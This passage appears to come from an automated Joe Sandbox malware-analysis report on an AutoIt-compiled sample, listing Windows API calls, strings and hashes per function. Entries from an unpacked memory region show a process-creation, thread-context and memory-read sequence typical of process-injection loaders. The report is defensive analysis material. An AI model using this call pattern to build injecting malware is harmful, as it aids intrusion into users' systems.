            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FA2BEF
            • RegisterClassExW.USER32(?), ref: 00FA2C40
              • Part of subcall function 00FA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00FA2D07
              • Part of subcall function 00FA2CD4: RegisterClassExW.USER32(00000030), ref: 00FA2D31
              • Part of subcall function 00FA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00FA2D42
              • Part of subcall function 00FA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00FA2D5F
              • Part of subcall function 00FA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00FA2D6F
              • Part of subcall function 00FA2CD4: LoadIconW.USER32(000000A9), ref: 00FA2D85
              • Part of subcall function 00FA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00FA2D94
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
            • String ID: #$0$AutoIt v3
            • API String ID: 423443420-4155596026
            • Opcode ID: 56ac6f88124be1861bf229a8b19e073a2386cde423ab26b73220a71468453f13
            • Instruction ID: b03ffc09dc4d34f9e5c9df882afd56b9a77e94dc2998f945953865d36106df20
            • Opcode Fuzzy Hash: 56ac6f88124be1861bf229a8b19e073a2386cde423ab26b73220a71468453f13
            • Instruction Fuzzy Hash: B0214975E00318ABEB219FA5E949AA97FB9FB48B50F00801BF580F66C4D7BA0554DF90

            Control-flow Graph

            (Rendered graph; edge list omitted. Blocks fa3170-fa326d and fe2d9c-fe2e96 call DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, KillTimer, CreatePopupMenu, MoveWindow and SetFocus.)
            APIs
            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00FA316A,?,?), ref: 00FA31D8
            • KillTimer.USER32(?,00000001,?,?,?,?,?,00FA316A,?,?), ref: 00FA3204
            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FA3227
            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00FA316A,?,?), ref: 00FA3232
            • CreatePopupMenu.USER32 ref: 00FA3246
            • PostQuitMessage.USER32(00000000), ref: 00FA3267
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
            • String ID: TaskbarCreated
            • API String ID: 129472671-2362178303
            • Opcode ID: 9a4f5db5f88acb63d3053650d740514a6d2c6750bdcdb6679b843b3871f682d9
            • Instruction ID: 914fb37365305bda1269c7791ace99e05ec879649fdcf7c26b0ddf53a67f99fb
            • Opcode Fuzzy Hash: 9a4f5db5f88acb63d3053650d740514a6d2c6750bdcdb6679b843b3871f682d9
            • Instruction Fuzzy Hash: 14417DB2E40200ABEB351B78DD0DB79369DFB47360F04411AF982E61C5DB7A9E41B3A1

            Control-flow Graph

            (Rendered graph; edge list omitted. Blocks fd8d45-fd90f9 call ReadFile, GetConsoleMode, ReadConsoleW and GetLastError.)
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d0425c9728b576dc6d1681900189e250412755e9cbfd9dfe6bdf7fb60dfb85fa
            • Instruction ID: 171afccf01e5d135626abff213e6e5e6b5d7fe87c5e3185cc647383b4d9a4af5
            • Opcode Fuzzy Hash: d0425c9728b576dc6d1681900189e250412755e9cbfd9dfe6bdf7fb60dfb85fa
            • Instruction Fuzzy Hash: 2FC12575D08349AFDB11DFE8D845BADBBB2AF09320F0C415AF454A7382C7798942EB61

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph (rendered figure, not reproduced): basic blocks f025c0-f028c2; API calls in the graph: CreateFileW, VirtualAlloc, ReadFile, FindCloseChangeNotification, VirtualFree.
            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00F02691
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F028B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
            • Instruction ID: 58bed2a2c15dc33c7b8215caf66f1d619f4d83c1394035764aa892f2960aaba7
            • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
            • Instruction Fuzzy Hash: 4DA11775E00209EBDB54CFA4C998BEEB7B5BF48314F208159E501BB2C0D7799A41EBA4

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph (rendered figure, not reproduced): single basic block fa2c63-fa2cd3; API calls in the graph: CreateWindowExW (2 calls), ShowWindow (2 calls).
            APIs
            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FA2C91
            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FA2CB2
            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FA1CAD,?), ref: 00FA2CC6
            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00FA1CAD,?), ref: 00FA2CCF
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$CreateShow
            • String ID: AutoIt v3$edit
            • API String ID: 1584632944-3779509399
            • Opcode ID: ed825e1b7fc0dff8bc63a876d8c1f5fb33f144b164841bd046ab287c0e299ad7
            • Instruction ID: 8b60eae2648c7b0d44d3b72d57002d0b9fa786ece591255577d783236a812bdb
            • Opcode Fuzzy Hash: ed825e1b7fc0dff8bc63a876d8c1f5fb33f144b164841bd046ab287c0e299ad7
            • Instruction Fuzzy Hash: 2DF0B7759503907AEB311727AC09E772EBDE7C6F50B01805AF944F6594C67A1850DBB0

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph (rendered figure, not reproduced): basic blocks f023b0-f02570; API calls in the graph: CreateFileW, VirtualAlloc, ReadFile, ExitProcess.
            APIs
              • Part of subcall function 00F022A0: Sleep.KERNELBASE(000001F4), ref: 00F022B1
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00F024AA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFileSleep
            • String ID: SGZQMSO92I8ML
            • API String ID: 2694422964-2071075998
            • Opcode ID: 13c6803767f886b5afb506aabee59da20dbb351a62d168796ba766d9fb02b439
            • Instruction ID: e3c437138f231588723673f1830a106850057e5d5b973d929cfa207c55830eb1
            • Opcode Fuzzy Hash: 13c6803767f886b5afb506aabee59da20dbb351a62d168796ba766d9fb02b439
            • Instruction Fuzzy Hash: DF517E31D14249EAEF10DBE4CC19BEEBB78AF44300F104199E608BB2C0D7B91B45EBA5

            Control-flow Graph

            APIs
            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01012C05
            • DeleteFileW.KERNEL32(?), ref: 01012C87
            • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01012C9D
            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01012CAE
            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 01012CC0
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: File$Delete$Copy
            • String ID:
            • API String ID: 3226157194-0
            • Opcode ID: ded1e6c6fd367efc87884379f1e2dc9e7d8582d1aade519dc2da617590a5c87c
            • Instruction ID: 1bdab275f572488435590bb20381b436874844f46ec391ec7ea119daf73163fb
            • Opcode Fuzzy Hash: ded1e6c6fd367efc87884379f1e2dc9e7d8582d1aade519dc2da617590a5c87c
            • Instruction Fuzzy Hash: F1B180B1D0011DABDF21DBA4CD85EDEB7BDEF49350F1040AAF609E6145EB389A448F60

            Control-flow Graph

            • Executed
            • Not Executed
            Control-flow graph (rendered figure, not reproduced): basic blocks fa3b1c-fa3b9b; API calls in the graph: RegOpenKeyExW, RegQueryValueExW, RegCloseKey.
            APIs
            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FA3B0F,SwapMouseButtons,00000004,?), ref: 00FA3B40
            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FA3B0F,SwapMouseButtons,00000004,?), ref: 00FA3B61
            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00FA3B0F,SwapMouseButtons,00000004,?), ref: 00FA3B83
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID: Control Panel\Mouse
            • API String ID: 3677997916-824357125
            • Opcode ID: a54174a7275fac593ae040f7262140e20025a2f92e34e4c05d5df2543ef2b7e6
            • Instruction ID: 21ec5f73e8349b0ede2ed2d3e2c633367e76f251534f03b3bdb0d8dca5222f17
            • Opcode Fuzzy Hash: a54174a7275fac593ae040f7262140e20025a2f92e34e4c05d5df2543ef2b7e6
            • Instruction Fuzzy Hash: D9112AB5511208FFDB208FA5DC85AAEB7BDEF46794B10445AB805E7114D331AE40A760
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 00F01A5B
            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F01AF1
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F01B13
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$ContextCreateMemoryReadThreadWow64
            • String ID:
            • API String ID: 2438371351-0
            • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
            • Instruction ID: de00c662e576db441060faf49b749ad90a1a3a61faa2254aade11e4097f0e027
            • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
            • Instruction Fuzzy Hash: E062F830A14258DBEB24CBA4C851BDEB376FF58300F1091A9D10DEB2D0E77A9E81DB59
            Strings
            • Variable must be of type 'Object'., xrefs: 00FF32B7
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID: Variable must be of type 'Object'.
            • API String ID: 0-109567571
            • Opcode ID: 9bfd510bc926ac7474b9e69cdd61131928d53fe91826e1a514f9a3bc816f4c3a
            • Instruction ID: a5c13a61489a08329fa404b06f1e611bec768545878fa91e22648292471c92d3
            • Opcode Fuzzy Hash: 9bfd510bc926ac7474b9e69cdd61131928d53fe91826e1a514f9a3bc816f4c3a
            • Instruction Fuzzy Hash: 82C28AB1E00215CFCB24CF58C880BADB7B1BF4A320F248569E956AB391D375ED41EB91
            APIs
            • __Init_thread_footer.LIBCMT ref: 00FAFE66
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Init_thread_footer
            • String ID:
            • API String ID: 1385522511-0
            • Opcode ID: 787e9ac7c460aa92637db42c998742cd7d13696401e7f218dabe82cd69fd925a
            • Instruction ID: ea732bddafa0ff29020ca69732e5df421bba0d805482b4e57102a4162853e7a5
            • Opcode Fuzzy Hash: 787e9ac7c460aa92637db42c998742cd7d13696401e7f218dabe82cd69fd925a
            • Instruction Fuzzy Hash: 87B27CB5A08341CFCB24CF54C480B2AB7E1BF8A310F14896DE9869B351D775ED49EB92
            APIs
            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00FE33A2
              • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FA3A04
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconLoadNotifyShell_String_wcslen
            • String ID: Line:
            • API String ID: 2289894680-1585850449
            • Opcode ID: bdfb174514b2408543d7725ee0a2e7257b6dc7384d80d283b8d3838a6b3d895b
            • Instruction ID: 3d19bc57950ab90a4fc71ea5590d2652ad1184481e663440571aa466142d20fb
            • Opcode Fuzzy Hash: bdfb174514b2408543d7725ee0a2e7257b6dc7384d80d283b8d3838a6b3d895b
            • Instruction Fuzzy Hash: 7831D0B1808300AEC725EB20DC46BEBB7ECAF46310F04452EF4D993091DB789649D7C2
            APIs
            • __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0668
              • Part of subcall function 00FC32A4: RaiseException.KERNEL32(?,?,?,00FC068A,?,01071444,?,?,?,?,?,?,00FC068A,00FA1129,01068738,00FA1129), ref: 00FC3304
            • __CxxThrowException@8.LIBVCRUNTIME ref: 00FC0685
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Exception@8Throw$ExceptionRaise
            • String ID: Unknown exception
            • API String ID: 3476068407-410509341
            • Opcode ID: bc4d62863bfdcb17ad7df24cf790254d301d593874b6a1e94011fd7fda88a66c
            • Instruction ID: c71957301a4dc004b74b5abc38ffe6720d8684fd43150e87016ad2e26f294065
            • Opcode Fuzzy Hash: bc4d62863bfdcb17ad7df24cf790254d301d593874b6a1e94011fd7fda88a66c
            • Instruction Fuzzy Hash: 06F0C834D0030FB78F00BA65DD4BE9D776C5E44360B508529B814D5591EF75DA2AF980
            APIs
            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0101302F
            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 01013044
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Temp$FileNamePath
            • String ID: aut
            • API String ID: 3285503233-3010740371
            • Opcode ID: b77727a98edd45100662c810b335c41fd363cc9017128045ad63b3293c584d51
            • Instruction ID: e25182b1c1cea86c342362b8d99e1c7446af06a8c6873ccf61fe6d3f2d8190fc
            • Opcode Fuzzy Hash: b77727a98edd45100662c810b335c41fd363cc9017128045ad63b3293c584d51
            • Instruction Fuzzy Hash: F3D05B7250031467DA3096969D0DFCB3A6CD704650F0002527695E6085DAB59544CBD0
            APIs
            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 010282F5
            • TerminateProcess.KERNEL32(00000000), ref: 010282FC
            • FreeLibrary.KERNEL32(?,?,?,?), ref: 010284DD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$CurrentFreeLibraryTerminate
            • String ID:
            • API String ID: 146820519-0
            • Opcode ID: 268c5a56a964f10af01d9027a657ec307008ad16e3867810ea85c1377d506853
            • Instruction ID: d60479cd2f2f6a0ea77116d269cf8bc86c43492a97b60ac186141c814596db9f
            • Opcode Fuzzy Hash: 268c5a56a964f10af01d9027a657ec307008ad16e3867810ea85c1377d506853
            • Instruction Fuzzy Hash: 36129C75A083118FD714DF28C480B6ABBE5FF89318F04895EE9898B352CB35E945CF92
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0e388bf9c3efe763894c8a561771119e8fe507e8f0020b112d8caa27ba1adbd9
            • Instruction ID: 87b4cef2ede641f00af708e32c844430658e7e863cd9c10453f234e54ac89134
            • Opcode Fuzzy Hash: 0e388bf9c3efe763894c8a561771119e8fe507e8f0020b112d8caa27ba1adbd9
            • Instruction Fuzzy Hash: 1751CE71D1060AABDB219FB4CD45FEEBBBAAF45B20F18001BF404A7391D6798901FB61
            APIs
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FA1BF4
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00FA1BFC
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FA1C07
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FA1C12
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00FA1C1A
              • Part of subcall function 00FA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00FA1C22
              • Part of subcall function 00FA1B4A: RegisterWindowMessageW.USER32(00000004,?,00FA12C4), ref: 00FA1BA2
            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FA136A
            • OleInitialize.OLE32 ref: 00FA1388
            • CloseHandle.KERNEL32(00000000,00000000), ref: 00FE24AB
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
            • String ID:
            • API String ID: 1986988660-0
            • Opcode ID: 67c58bf25f10b07211040819e555002e3f62a24387102089d4889a396419a1c5
            • Instruction ID: e3e1e9ad0358395d30680347834f803e95d31ba03baeb2eee279c9a2b5ce74c9
            • Opcode Fuzzy Hash: 67c58bf25f10b07211040819e555002e3f62a24387102089d4889a396419a1c5
            • Instruction Fuzzy Hash: 8471BCB4D11300CEC3A8EF79E9466553AE5FB49340759822AD0DAF72C9EB3E4405DF54
            APIs
            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00FA556D
            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00FA557D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: dc7e5bf343b106c348a0f25a65e8987d995113c2c3103861fe154b44be5f744c
            • Instruction ID: f9de5fd8b3212bd661214d14d7e8e6e57f3caa8e553b401737737265141336d6
            • Opcode Fuzzy Hash: dc7e5bf343b106c348a0f25a65e8987d995113c2c3103861fe154b44be5f744c
            • Instruction Fuzzy Hash: 3E3160B1E00609FFDB14CF68C884B99B7B6FB48724F188229E91597240D771FD94EB90
            APIs
            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00FD85CC,?,01068CC8,0000000C), ref: 00FD8704
            • GetLastError.KERNEL32(?,00FD85CC,?,01068CC8,0000000C), ref: 00FD870E
            • __dosmaperr.LIBCMT ref: 00FD8739
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
